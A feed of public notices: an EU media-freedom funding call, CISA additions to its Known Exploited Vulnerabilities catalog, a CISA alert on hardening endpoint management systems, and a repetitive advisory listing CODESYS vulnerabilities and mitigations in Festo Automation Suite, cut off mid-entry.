Flux RSS

The European Union – the media freedom hub marsrgi Thu, 03/19/2026 - 08:58 Opening: 16 April 2026 Closing: 28 May 2026 The overall goal of this preparatory action is to continue the activities of the ongoing Free Media Hub EAST project, i.e. to sustain and improve existing financial and other kinds of support to exiled independent media from Russia, Belarus, as well as media from Ukraine that has relocated in the EU, and to foster the coordination and consolidation of a pan-European platform or network of media hubs to promote the preservation of a pluralistic media environment. GettyImages © Mihajlo Maricic Main link https://ec.europa.eu/info/funding-tenders/opportunities/portal/screen/opportuni… Related topics Media and democracy Media freedom and pluralism International relations Funding for Digital Actions to Support Ukraine Democracy in the digital age {"service":"share","version":"2.0","color":true,"networks":["x","facebook","linkedin","email","more"]}

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-20963 Microsoft SharePoint Deserialization of Untrusted Data Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2025-66376 Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

CISA is aware of malicious cyber activity targeting endpoint management systems of U.S. organizations based on the March 11, 2026 cyberattack against U.S.-based medical technology firm Stryker Corporation, which affected their Microsoft environment.1 To defend against similar malicious cyber activity, CISA urges organizations to harden endpoint management system configurations using the recommendations and resources provided in this alert. CISA is conducting enhanced coordination with federal partners, including the Federal Bureau of Investigation (FBI), to identify additional threats and determine mitigation actions. To defend against similar malicious activity that misuses legitimate endpoint management software, CISA urges organizations to implement Microsoft’s newly released best practices for securing Microsoft Intune; the principles of these recommendations can be applied to Intune and more broadly to other endpoint management software: Use principles of least privilege when designing administrative roles. Leverage Microsoft Intune’s role-based access control (RBAC) to assign the minimum permissions necessary to each role for completing day-to-day operations—permissions include what actions the role can take, and what users and devices it can apply that action to. Enforce phishing-resistant multi-factor authentication (MFA) and privileged access hygiene. Use Microsoft Entra ID capabilities (including Conditional Access, MFA, risk signals, and privileged access controls) to block unauthorized access to privileged actions in Microsoft Intune. Configure access policies to require Multi Admin Approval in Microsoft Intune. Set up policies that require a second administrative account’s approval to allow changes to sensitive or high-impact actions (such as device wiping), applications, scripts, RBAC, configurations, etc. Additionally, CISA recommends reviewing the following resources to strengthen defenses against similar malicious cyber activity: Microsoft resources: For recommendations on securing Microsoft Intune, see Best practices for securing Microsoft Intune. For guidance on implementing Multi Admin Approval in Microsoft Intune, see Use Access policies to implement Multi Admin Approval. For recommendations on configuring Microsoft Intune using zero trust principles, see Configure Microsoft Intune for increased security. For guidance on implementing Microsoft Intune RBAC policies, see Role-based access control (RBAC) with Microsoft Intune. For guidance on deploying Privileged Identity Management (PIM) across Microsoft Intune, Entra ID, and other Microsoft software, see Plan a Privileged Identity Management deployment. CISA resources: For guidance on implementing phishing-resistant multifactor authentication (MFA), see Implementing Phishing-Resistant MFA. Disclaimer The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA. Acknowledgements Microsoft and Stryker contributed to this alert. Notes 1 For updates from Stryker on the incident, see “Customer Updates: Stryker Network Disruption,” Stryker, last modified March 15, 2026, https://www.stryker.com/us/en/about/news/2026/a-message-to-our-customers-03-2026.html.

CEF-Digital Info Session: 2026 Calls Anonymous (not verified) Wed, 03/18/2026 - 10:35 26 March 2026 Online Learn more about the calls "Equipment for smart European cable systems" (CEF-DIG-2026-SMART-CABLES) and "Backbone connectivity for Digital Global Gateways" (CEF-DIG-2026-GATEWAYS). GettyImages © Dragon Claws Main link https://hadea.ec.europa.eu/events/cef-digital-info-session-2026-calls-2026-03-2… Related topics Connecting Europe Facility Funding for Digital Related content Press release 17 March 2026 Commission makes available €200 million for submarine cable and digital infrastructure projects The European Commission has opened two new Connecting Europe Facility (CEF) calls worth €200 million for projects in high-capacity networks, including submarine cables. {"service":"share","version":"2.0","color":true,"networks":["x","facebook","linkedin","email","more"]}

View CSAF Summary 3. TECHNICAL DETAILS The following versions of CODESYS in Festo Automation Suite are affected: FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0) vers:all/* FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10) vers:all/* FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0) vers:all/* FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10) vers:all/* CVSS Vendor Equipment Vulnerabilities v3 9.8 FESTO, CODESYS CODESYS in Festo Automation Suite Direct Request ('Forced Browsing'), Untrusted Search Path, Improper Restriction of Operations within the Bounds of a Memory Buffer, Uncontrolled Recursion, Improper Access Control, Use of Insufficiently Random Values, Improper Restriction of Communication Channel to Intended Endpoints, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), NULL Pointer Dereference, Stack-based Buffer Overflow, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Incorrect Permission Assignment for Critical Resource, Improper Handling of Exceptional Conditions, Exposure of Resource to Wrong Sphere, Allocation of Resources Without Limits or Throttling, Use of a Broken or Risky Cryptographic Algorithm, Out-of-bounds Write, Weak Password Recovery Mechanism for Forgotten Password, Improper Privilege Management, Use of Password Hash With Insufficient Computational Effort, Buffer Access with Incorrect Length Value, Improper Input Validation, Improper Verification of Cryptographic Signature, Inadequate Encryption Strength, Origin Validation Error, Missing Release of Memory after Effective Lifetime, Improper Resource Shutdown or Release, Deserialization of Untrusted Data, Path Equivalence: '//multiple/leading/slash', Insufficient Verification of Data Authenticity, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Missing Authentication for Critical Function, Out-of-bounds Read, Failure to Sanitize Special Elements into a Different Plane (Special Element Injection), Use of Out-of-range Pointer Offset, Improper Neutralization of Script in Attributes of IMG Tags in a Web Page, Files or Directories Accessible to External Parties, Untrusted Pointer Dereference, Path Traversal: '....' (Multiple Dot), ASP.NET Misconfiguration: Missing Custom Error Page, Uncontrolled Resource Consumption, Unprotected Transport of Credentials, Initialization of a Resource with an Insecure Default, Heap-based Buffer Overflow, Unexpected Sign Extension, Buffer Over-read, Uncontrolled Search Path Element, Improper Verification of Source of a Communication Channel, Improper Restriction of Excessive Authentication Attempts, Use After Free, ASP.NET Misconfiguration: Password in Configuration File, Improper Check for Unusual or Exceptional Conditions, Observable Discrepancy, Incorrect Default Permissions Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-2595 An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-425 Direct Request ('Forced Browsing') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2010-5250 Untrusted search path vulnerability in the pthread_win32_process_attach_np function in pthreadGC2.dll in Pthreads-win32 2.8.0 allows local users to gain privileges via a Trojan horse quserex.dll file in the current working directory.NOTE: some of these details are obtained from third party information. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-426 Untrusted Search Path Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.8 HIGH CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2017-3735 While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N CVE-2018-0739 Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n). View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H CVE-2018-10612 In 3S-Smart Software Solutions GmbH CODESYS Control V3 products prior to version 3.5.14.0, user access management and communication encryption is not enabled by default, which could allow an attacker access to the device and sensitive information, including user credentials. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-284 Improper Access Control Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2018-20025 Use of Insufficiently Random Values exists in CODESYS V3 products versions prior V3.5.14.0. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-330 Use of Insufficiently Random Values Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2018-20026 Improper Communication Address Filtering exists in CODESYS V3 products versions prior V3.5.14.0. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-923 Improper Restriction of Communication Channel to Intended Endpoints Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2019-13532 CODESYS V3 web server, all versions prior to 3.5.14.10, allows an attacker to send specially crafted http or https requests which may allow access to files outside the restricted working directory of the controller. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2019-13538 3S-Smart Software Solutions GmbH CODESYS V3 Library Manager, all versions prior to 3.5.16.0, allows the system to display active library content without checking its validity, which may allow the contents of manipulated libraries to be displayed or executed. The issue also exists for source libraries, but 3S-Smart Software Solutions GmbH strongly recommends distributing compiled libraries only. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.6 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H CVE-2019-13542 3S-Smart Software Solutions GmbH CODESYS V3 OPC UA Server, all versions 3.5.11.0 to 3.5.15.0, allows an attacker to send crafted requests from a trusted OPC UA client that cause a NULL pointer dereference, which may trigger a denial-of-service condition. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more 